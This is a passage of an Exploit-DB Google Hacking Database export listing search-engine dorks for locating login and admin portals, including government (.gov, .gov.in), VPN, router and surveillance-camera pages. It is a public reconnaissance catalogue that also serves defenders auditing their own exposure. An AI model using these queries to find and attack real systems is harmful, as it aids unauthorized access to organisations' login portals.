<querystring>https://www.google.com/search?q=intext:OpenCart inurl:index.php?route=common/dashboard</querystring>
<edb></edb>
<date>2020-03-03</date>
<author>UsmanAliMaan</author>
</entry>
<entry>
<id>7033</id>
<link>https://www.exploit-db.com/ghdb/7033</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:Paessler AG - The Network Monitoring Company inurl:/index.htm intitle:&quot;Welcome | PRTG Network Monitor&quot; -&quot;User Manual&quot;</shortDescription>
<textualDescription># Google Dork: intext:Paessler AG - The Network Monitoring Company inurl:/index.htm intitle:&quot;Welcome | PRTG Network Monitor&quot; -&quot;User Manual&quot;
# Pages Containing Login Portals
# Date: 21/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>intext:Paessler AG - The Network Monitoring Company inurl:/index.htm intitle:&quot;Welcome | PRTG Network Monitor&quot; -&quot;User Manual&quot;</query>
<querystring>https://www.google.com/search?q=intext:Paessler AG - The Network Monitoring Company inurl:/index.htm intitle:&quot;Welcome | PRTG Network Monitor&quot; -&quot;User Manual&quot;</querystring>
<edb></edb>
<date>2021-07-22</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>5109</id>
<link>https://www.exploit-db.com/ghdb/5109</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:pin | userid &amp; password intitle:supplier | supply &amp; login | portal</shortDescription>
<textualDescription>Login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:pin | userid &amp; password intitle:supplier | supply &amp; login | portal</query>
<querystring>https://www.google.com/search?q=intext:pin | userid &amp; password intitle:supplier | supply &amp; login | portal</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6603</id>
<link>https://www.exploit-db.com/ghdb/6603</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:piwik &quot;login&quot;</shortDescription>
<textualDescription>#Exploit Title : PIWIK login pages.
#Google Dork : intext:piwik &quot;login&quot;
#Date : 12/10/2020
#Exploit Author : Sanu Jose M
Thanks &amp; Regards,
Sanu Jose M
</textualDescription>
<query>intext:piwik &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intext:piwik &quot;login&quot;</querystring>
<edb></edb>
<date>2020-10-12</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>6619</id>
<link>https://www.exploit-db.com/ghdb/6619</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:Please Login SSL VPN inurl:remote/login intext:FortiClient</shortDescription>
<textualDescription>#Google Dork: intext:Please Login SSL VPN inurl:remote/login
#intext:FortiClient
#Description : Fortinet VPN login pages.
#Date : 19/10/2020
#Exploit Author: Aninda Saha
Proof Of Concept:
</textualDescription>
<query>intext:Please Login SSL VPN inurl:remote/login intext:FortiClient</query>
<querystring>https://www.google.com/search?q=intext:Please Login SSL VPN inurl:remote/login intext:FortiClient</querystring>
<edb></edb>
<date>2020-10-19</date>
<author>Aninda Saha</author>
</entry>
<entry>
<id>7496</id>
<link>https://www.exploit-db.com/ghdb/7496</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:Project hosted at: For support, contact: Copyright Openbravo</shortDescription>
<textualDescription># Google Dork: intext:Project hosted at: For support, contact: Copyright Openbravo
# Pages Containing Login Portals
# Date:26/10/2021
# Exploit Author: Naïm Gallouj</textualDescription>
<query>intext:Project hosted at: For support, contact: Copyright Openbravo</query>
<querystring>https://www.google.com/search?q=intext:Project hosted at: For support, contact: Copyright Openbravo</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Naïm Gallouj</author>
</entry>
<entry>
<id>7261</id>
<link>https://www.exploit-db.com/ghdb/7261</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:Provided by ProjectSend</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Polycom Login&quot; inurl:&quot;/login.html&quot;
# Pages Containing Login Portals
#Date: 30/08/2021
# Exploit Author: Mugdha Peter Bansode</textualDescription>
<query>intext:Provided by ProjectSend</query>
<querystring>https://www.google.com/search?q=intext:Provided by ProjectSend</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7380</id>
<link>https://www.exploit-db.com/ghdb/7380</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:Provided by ProjectSend</shortDescription>
<textualDescription># Google Dork: intext:Provided by ProjectSend
# Pages Containing Login Portals
# Date: 30/08/2021
# Exploit Author: Abdullah Kala
</textualDescription>
<query>intext:Provided by ProjectSend</query>
<querystring>https://www.google.com/search?q=intext:Provided by ProjectSend</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Abdullah Kala</author>
</entry>
<entry>
<id>3841</id>
<link>https://www.exploit-db.com/ghdb/3841</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx</shortDescription>
<textualDescription>Category : Pages containing login portals
Description : Dork for finding sensitive login portals
Dork : intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx
Link : https://encrypted.google.com/#hl=en&amp;output=search&amp;sclient=psy-ab&amp;q=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&amp;oq=intext:THIS+IS+A+PRIVATE+SYSTEM+AUTHORISED+ACCESS+ONLY+inurl%3Alogin.aspx&amp;gs_l=hp.3...852.852.0.983.1.1.0.0.0.0.121.121.0j1.1.0...0.0...1c.1.7.psy-ab.664iAsY450k&amp;pbx=1&amp;bav=on.2,or.r_qf.&amp;bvm=bv.44011176,d.d2k&amp;fp=7b93b16efbccc178&amp;biw=1362&amp;bih=667
Date : 20/3/2013
Exploit Author: Scott Sturrock
Email: f00bar'at'linuxmail'dot'org</textualDescription>
<query>intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx</query>
<querystring>https://www.google.com/search?q=intext:THIS IS A PRIVATE SYSTEM AUTHORISED ACCESS ONLY inurl:login.aspx</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>3842</id>
<link>https://www.exploit-db.com/ghdb/3842</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx</shortDescription>
<textualDescription>Category : Pages containing login portals
Description : Dork for finding government login portals
Dork : intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx
Link : https://encrypted.google.com/#hl=en&amp;output=search&amp;sclient=psy-ab&amp;q=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&amp;oq=intext:YOU+ARE+ACCESSING+A+GOVERNMENT+INFORMATION+SYSTEM+inurl%3Alogin.aspx&amp;gs_l=hp.3...894.894.0.1059.1.1.0.0.0.0.116.116.0j1.1.0...0.0...1c.1.7.psy-ab.lvawmQ4rKqA&amp;pbx=1&amp;bav=on.2,or.r_qf.&amp;bvm=bv.44011176,d.d2k&amp;fp=7b93b16efbccc178&amp;biw=1362&amp;bih=667
Date : 20/3/2013
Author : Scott Sturrock
Email: f00bar'at'linuxmail'dot'org</textualDescription>
<query>intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx</query>
<querystring>https://www.google.com/search?q=intext:YOU ARE ACCESSING A GOVERNMENT INFORMATION SYSTEM inurl:login.aspx</querystring>
<edb></edb>
<date>2013-04-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>1184</id>
<link>https://www.exploit-db.com/ghdb/1184</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;*- HP WBEM Login&quot; | &quot;You are being prompted to provide login account information for *&quot; | &quot;Please provide the information requested and press</shortDescription>
<textualDescription>HP WBEM Clients are WBEM enabled management applications that provide the user interface and functionality system administrators need to manage their environment.</textualDescription>
<query>intitle:&quot;*- HP WBEM Login&quot; | &quot;You are being prompted to provide login account information for *&quot; | &quot;Please provide the information requested and press</query>
<querystring>https://www.google.com/search?q=intitle:%22*-+HP+WBEM+Login%22+%7C+%22You+are+being+prompted+to+provide+login+account+information+for+*%22+%7C+%22Please+provide+the+information+requested+and+press+the+OK+button+to+complete+the+login+process%22+%7C+%22%3C!</querystring>
<edb></edb>
<date>2005-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>6254</id>
<link>https://www.exploit-db.com/ghdb/6254</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;*Admin Intranet Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;*Admin Intranet Login&quot;
# Just a few admin intranet login pages.
# Date: 2020-06-09
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;*Admin Intranet Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;*Admin Intranet Login&quot;</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3868</id>
<link>https://www.exploit-db.com/ghdb/3868</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;.:: Welcome to the Web-Based Configurator::.&quot; &amp; intext:&quot;Welcome to your router Configuration Interface&quot;</shortDescription>
<textualDescription>#Summary: ZyXEL router login portal
#Category: Pages containing login portals
#Author: g00gl3 5c0u7
NOTE:
currently exists this -&gt; https://www.exploit-db.com/ghdb/270/ but only shows
8 results against 63100 that i sent, also covers more models.</textualDescription>
<query>intitle:&quot;.:: Welcome to the Web-Based Configurator::.&quot; &amp; intext:&quot;Welcome to your router Configuration Interface&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;.:: Welcome to the Web-Based Configurator::.&quot; &amp; intext:&quot;Welcome to your router Configuration Interface&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7050</id>
<link>https://www.exploit-db.com/ghdb/7050</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;3G wireless gateway&quot; &quot;login&quot; intext:&quot;huawei technologies&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;3G wireless gateway&quot; &quot;login&quot; intext:&quot;huawei technologies&quot;
# Category: Various Online Devices
# Date: 09/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;3G wireless gateway&quot; &quot;login&quot; intext:&quot;huawei technologies&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;3G wireless gateway&quot; &quot;login&quot; intext:&quot;huawei technologies&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>3880</id>
<link>https://www.exploit-db.com/ghdb/3880</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;::: Login :::&quot; &amp; intext:&quot;Customer Login&quot; &amp; &quot;Any time &amp; Any where&quot;</shortDescription>
<textualDescription>#Summary: Surveillance login portals
#Author: g00gl3 5c0u7</textualDescription>
<query>intitle:&quot;::: Login :::&quot; &amp; intext:&quot;Customer Login&quot; &amp; &quot;Any time &amp; Any where&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;::: Login :::&quot; &amp; intext:&quot;Customer Login&quot; &amp; &quot;Any time &amp; Any where&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7053</id>
<link>https://www.exploit-db.com/ghdb/7053</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ADB Broadband&quot; login intext:&quot;ADB Broadband S.p.A&quot; -.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ADB Broadband&quot; login intext:&quot;ADB Broadband S.p.A&quot; -.com
# Category: Various Online Devices
# Date: 09/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;ADB Broadband&quot; login intext:&quot;ADB Broadband S.p.A&quot; -.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ADB Broadband&quot; login intext:&quot;ADB Broadband S.p.A&quot; -.com</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>5220</id>
<link>https://www.exploit-db.com/ghdb/5220</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;admin console&quot; inurl:login site:&quot;*.edu&quot;|site:&quot;*.gov&quot;|site:&quot;*.net&quot; -site:*.com -help -guide -documentation -release -notes -configure -support -price -cant</shortDescription>
<textualDescription>I have discovered a google dork that reveals a number of admin
console pages for websites ending in edu / gov or net.
*Google Dork*
intitle:&quot;admin console&quot; inurl:login site:&quot;*.edu&quot;|site:&quot;*.gov&quot;|site:&quot;*.net&quot;
-site:*.com -help -guide -documentation -release -notes -configure -support
-price -cant
*Dates: *21-05-2019
*Dork Author:* acc3ssp0int</textualDescription>
<query>intitle:&quot;admin console&quot; inurl:login site:&quot;*.edu&quot;|site:&quot;*.gov&quot;|site:&quot;*.net&quot; -site:*.com -help -guide -documentation -release -notes -configure -support -price -cant</query>
<querystring>https://www.google.com/search?q=intitle:&quot;admin console&quot; inurl:login site:&quot;*.edu&quot;|site:&quot;*.gov&quot;|site:&quot;*.net&quot; -site:*.com -help -guide -documentation -release -notes -configure -support -price -cant</querystring>
<edb></edb>
<date>2019-05-21</date>
<author>acc3ssp0int</author>
</entry>
<entry>
<id>1136</id>
<link>https://www.exploit-db.com/ghdb/1136</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Admin Login&quot; &quot;admin login&quot; &quot;blogware&quot;</shortDescription>
<textualDescription>Blogware Login Portal: &quot;An exciting and innovative tool for creating or enhancing your web presence. It is your key to easy publishing on the World Wide Web – share pictures, video, links, documents, newsletters, opinions and more, with family, friends and colleagues. Now you can have a website without being a Webmaster. It’s simple! There is no HTML to learn and no new software to download and install.&quot;</textualDescription>
<query>intitle:&quot;Admin Login&quot; &quot;admin login&quot; &quot;blogware&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22Admin+Login%22+%22admin+login%22+%22blogware%22+-site%3Ablogware.com+-filetype%3Ahtml</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1224</id>
<link>https://www.exploit-db.com/ghdb/1224</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Admin login&quot; &quot;Web Site Administration&quot; &quot;Copyright&quot;</shortDescription>
<textualDescription>sift Group makes a web site administration product which can be accessed via a web browser. This dork locates their admin login.</textualDescription>
<query>intitle:&quot;Admin login&quot; &quot;Web Site Administration&quot; &quot;Copyright&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Admin+login%22+%22Web+Site+Administration%22+%22Copyright%22+&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2005-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7502</id>
<link>https://www.exploit-db.com/ghdb/7502</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Admin Login&quot; inurl:&quot;login.aspx&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Admin Login&quot; inurl:&quot;login.aspx&quot;
# Pages Containing Login Portals
# Date:26/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;Admin Login&quot; inurl:&quot;login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Admin Login&quot; inurl:&quot;login.aspx&quot;</querystring>
<edb></edb>
<date>2021-10-27</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7185</id>
<link>https://www.exploit-db.com/ghdb/7185</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;admin login&quot; site:.gov</shortDescription>
<textualDescription># Google Dork: intitle:&quot;admin login&quot; site:.gov
# Pages Containing Login Portals
# Date: 08/09/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>intitle:&quot;admin login&quot; site:.gov</query>
<querystring>https://www.google.com/search?q=intitle:&quot;admin login&quot; site:.gov</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7203</id>
<link>https://www.exploit-db.com/ghdb/7203</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;admin login&quot; site:.gov</shortDescription>
<textualDescription># Google Dork: intitle:&quot;admin login&quot; site:.gov
# Pages Containing Login Portals
# Date: 09/09/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>intitle:&quot;admin login&quot; site:.gov</query>
<querystring>https://www.google.com/search?q=intitle:&quot;admin login&quot; site:.gov</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7285</id>
<link>https://www.exploit-db.com/ghdb/7285</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;admin login&quot; site:.gov.in</shortDescription>
<textualDescription># Google Dork: intitle:&quot;admin login&quot; site:.gov.in
# Pages Containing Login Portals
# Date: 21/09/2021
# Exploit Author: Deven Rathod</textualDescription>
<query>intitle:&quot;admin login&quot; site:.gov.in</query>
<querystring>https://www.google.com/search?q=intitle:&quot;admin login&quot; site:.gov.in</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>Deven Rathod</author>
</entry>
<entry>
<id>7231</id>
<link>https://www.exploit-db.com/ghdb/7231</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;admin login&quot; site:.in</shortDescription>
<textualDescription># Google Dork: intitle:&quot;admin login&quot; site:.in
# Pages Containing Login Portals
# Date: 15/09/2021
# Exploit Author: Priya Dalal</textualDescription>
<query>intitle:&quot;admin login&quot; site:.in</query>
<querystring>https://www.google.com/search?q=intitle:&quot;admin login&quot; site:.in</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Priya Dalal</author>
</entry>
<entry>
<id>7221</id>
<link>https://www.exploit-db.com/ghdb/7221</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;admin login&quot; site:.net</shortDescription>
<textualDescription># Google Dork: intitle:&quot;admin login&quot; site:.net
# Pages Containing Login Portals
# Date: 12/09/2021
# Exploit Author: Priya Dalal</textualDescription>
<query>intitle:&quot;admin login&quot; site:.net</query>
<querystring>https://www.google.com/search?q=intitle:&quot;admin login&quot; site:.net</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Priya Dalal</author>
</entry>
<entry>
<id>7223</id>
<link>https://www.exploit-db.com/ghdb/7223</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;admin login&quot; site:.org</shortDescription>
<textualDescription># Google Dork: intitle:&quot;admin login&quot; site:.org
# Pages Containing Login Portals
# Date: 13/09/2021
# Exploit Author: Bhavin Amesara
</textualDescription>
<query>intitle:&quot;admin login&quot; site:.org</query>
<querystring>https://www.google.com/search?q=intitle:&quot;admin login&quot; site:.org</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Bhavin Amesara</author>
</entry>
<entry>
<id>7184</id>
<link>https://www.exploit-db.com/ghdb/7184</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;admin panel&quot; OR intitle:&quot;request password&quot; intext:&quot;email address&quot;</shortDescription>
<textualDescription># Exploit Title: intitle:&quot;admin panel&quot; OR intitle:&quot;request password&quot; intext:&quot;email address&quot;
# Date: 07/09/2021
# Exploit Author: Gonzalo Carrasco
</textualDescription>
<query>intitle:&quot;admin panel&quot; OR intitle:&quot;request password&quot; intext:&quot;email address&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;admin panel&quot; OR intitle:&quot;request password&quot; intext:&quot;email address&quot;</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>Gonzalo Carrasco</author>
</entry>
<entry>
<id>7055</id>
<link>https://www.exploit-db.com/ghdb/7055</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ADMINISTRATOR LOGIN&quot; inurl:adminlogin</shortDescription>
<textualDescription>GOOGLE DORK: intitle:&quot;ADMINISTRATOR LOGIN&quot; inurl:adminlogin
GIVES THE ADMINISTRATOR LOGIN PANELS
</textualDescription>
<query>intitle:&quot;ADMINISTRATOR LOGIN&quot; inurl:adminlogin</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ADMINISTRATOR LOGIN&quot; inurl:adminlogin</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>Sanem Sudheendra</author>
</entry>
<entry>
<id>1416</id>
<link>https://www.exploit-db.com/ghdb/1416</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;AdventNet ManageEngine ServiceDesk Plus&quot; intext:&quot;Remember Me&quot;</shortDescription>
<textualDescription>serviceDesk Plus is a 100 % web-based Help Desk and Asset Management software.vendor: h**p://manageengine.adventnet.com/products/service-desk/index.htmlmanual: h**p://manageengine.adventnet.com/products/service-desk/help/adminguide/index.html</textualDescription>
<query>intitle:&quot;AdventNet ManageEngine ServiceDesk Plus&quot; intext:&quot;Remember Me&quot;</query>
<querystring>https://www.google.com/search?q=(intitle:%22AdventNet+ManageEngine+ServiceDesk+Plus%22%7C%22Remember+Me.+Copyright+%C2%A9+2005+AdventNet+Inc.+All+rights+reserved.%22)+intext:%22Remember+Me%22+&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>1066</id>
<link>https://www.exploit-db.com/ghdb/1066</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;AlternC Desktop&quot;</shortDescription>
<textualDescription>This finds the login page for AlternC Desktop I dont know what versions.</textualDescription>
<query>intitle:&quot;AlternC Desktop&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22AlternC+Desktop%22</querystring>
<edb></edb>
<date>2005-08-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5598</id>
<link>https://www.exploit-db.com/ghdb/5598</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;API Publisher- Login&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;API Publisher- Login&quot;
Author: M. Cory Billington (@_th3y)
Info: WSO2 Login portals
</textualDescription>
<query>intitle:&quot;API Publisher- Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;API Publisher- Login&quot;</querystring>
<edb></edb>
<date>2019-10-28</date>
<author>M. Cory Billington</author>
</entry>
<entry>
<id>4211</id>
<link>https://www.exploit-db.com/ghdb/4211</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ASUS Login&quot; &quot;SIGN IN&quot;</shortDescription>
<textualDescription>Description: ASUS router login page
Google search: intitle:&quot;ASUS Login&quot; &quot;SIGN IN&quot;
Author: nebo_oben</textualDescription>
<query>intitle:&quot;ASUS Login&quot; &quot;SIGN IN&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ASUS Login&quot; &quot;SIGN IN&quot;</querystring>
<edb></edb>
<date>2016-03-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>7104</id>
<link>https://www.exploit-db.com/ghdb/7104</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Asus Login&quot; inurl:Main_Login.asp</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Asus Login&quot; inurl:Main_Login.asp
# Category: Pages Containing Login Portals
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;Asus Login&quot; inurl:Main_Login.asp</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Asus Login&quot; inurl:Main_Login.asp</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6133</id>
<link>https://www.exploit-db.com/ghdb/6133</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ASUS&quot; AND inurl:&quot;Main_Login.asp&quot; AND intext:&quot;router account&quot; -asus.com</shortDescription>
<textualDescription># Google Dork: intitle:&quot;ASUS&quot; AND inurl:&quot;Main_Login.asp&quot; AND intext:&quot;router
account&quot; -asus.com
# Description: Find ASUS router login page for different versions.
# Author: Carlos Ramírez L. (BillyV4)
</textualDescription>
<query>intitle:&quot;ASUS&quot; AND inurl:&quot;Main_Login.asp&quot; AND intext:&quot;router account&quot; -asus.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;ASUS&quot; AND inurl:&quot;Main_Login.asp&quot; AND intext:&quot;router account&quot; -asus.com</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>BillyV4</author>
</entry>
<entry>
<id>783</id>
<link>https://www.exploit-db.com/ghdb/783</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Athens Authentication Point&quot;</shortDescription>
<textualDescription>Athens is an Access Management system for controlling access to web based subscription services. It offers: * secure single username access to multiple web-based access controlled services * devolved administration facilities at organisation level * remote access user accounts * encrypted account bulk upload facilities * scalable services with 3 million accounts * replication facilities at several separate physical locations, offering a resilient authentication service</textualDescription>
<query>intitle:&quot;Athens Authentication Point&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Athens+Authentication+Point%22</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6480</id>
<link>https://www.exploit-db.com/ghdb/6480</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;axigen webadmin&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;axigen webadmin&quot;
# Author: Edwyn Sanders
# Date: 16-08-2020
# Description: shows all businesses that use axigen WebAdmin using the web
browser
Mgter Edwyn Roberto Sanders Rivera
Gerente Propietario
EdificaWeb
*E-MAIL:* esanders@edificaweb.com
*Website:* www.edificaweb.com
</textualDescription>
<query>intitle:&quot;axigen webadmin&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;axigen webadmin&quot;</querystring>
<edb></edb>
<date>2020-08-17</date>
<author>Edwyn Sanders</author>
</entry>
<entry>
<id>1225</id>
<link>https://www.exploit-db.com/ghdb/1225</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;b2evo &gt; Login form&quot; &quot;Login form. You must log in! You will have to accept cookies in order to log in&quot; -demo -site:b2evolution.net</shortDescription>
<textualDescription>b2evolution is a free open-source blogging system from b2evolution.net. This dork finds the admin login.</textualDescription>
<query>intitle:&quot;b2evo &gt; Login form&quot; &quot;Login form. You must log in! You will have to accept cookies in order to log in&quot; -demo -site:b2evolution.net</query>
<querystring>https://www.google.com/search?q=intitle:%22b2evo+%3E+Login+form%22+%22Login+form.+You+must+log+in!+You+will+have+to+accept+cookies+in+order+to+log+in%22++-demo+-site:b2evolution.net&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6814</id>
<link>https://www.exploit-db.com/ghdb/6814</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Blue Iris Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Blue Iris Login&quot;
# Various online devices (Blue Iris Video surveillance login portals).
# Date: 03/03/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Blue Iris Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Blue Iris Login&quot;</querystring>
<edb></edb>
<date>2021-03-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4792</id>
<link>https://www.exploit-db.com/ghdb/4792</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;BMC Remedy Mid Tier&quot; &quot;login&quot;</shortDescription>
<textualDescription>BMC Remedy login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;BMC Remedy Mid Tier&quot; &quot;login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;BMC Remedy Mid Tier&quot; &quot;login&quot;</querystring>
<edb></edb>
<date>2018-04-25</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7134</id>
<link>https://www.exploit-db.com/ghdb/7134</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;BoardPAC - Board Paper and Credit Proposal Management System&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;BoardPAC - Board Paper and Credit Proposal Management System&quot;
# Category: Pages Containing Login Portals
# Date: 26/08/2021
# Exploit Author: Harsh J, Omkar G, Amit C</textualDescription>
<query>intitle:&quot;BoardPAC - Board Paper and Credit Proposal Management System&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;BoardPAC - Board Paper and Credit Proposal Management System&quot;</querystring>
<edb></edb>
<date>2021-08-26</date>
<author>Harsh Mukeshbhai Joshi</author>
</entry>
<entry>
<id>5388</id>
<link>https://www.exploit-db.com/ghdb/5388</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Calendarix Admin Login&quot;</shortDescription>
<textualDescription>Login page :
intitle:&quot;Calendarix Admin Login&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;Calendarix Admin Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Calendarix Admin Login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>3699</id>
<link>https://www.exploit-db.com/ghdb/3699</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;cascade server&quot; inurl:login.act</shortDescription>
<textualDescription>Search for login screen of default instance: Cascade Server CMS by Hannon Author: Erik Horton</textualDescription>
<query>intitle:&quot;cascade server&quot; inurl:login.act</query>
<querystring>https://www.google.com/search?q=intitle:&quot;cascade server&quot; inurl:login.act</querystring>
<edb></edb>
<date>2011-03-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5675</id>
<link>https://www.exploit-db.com/ghdb/5675</link>
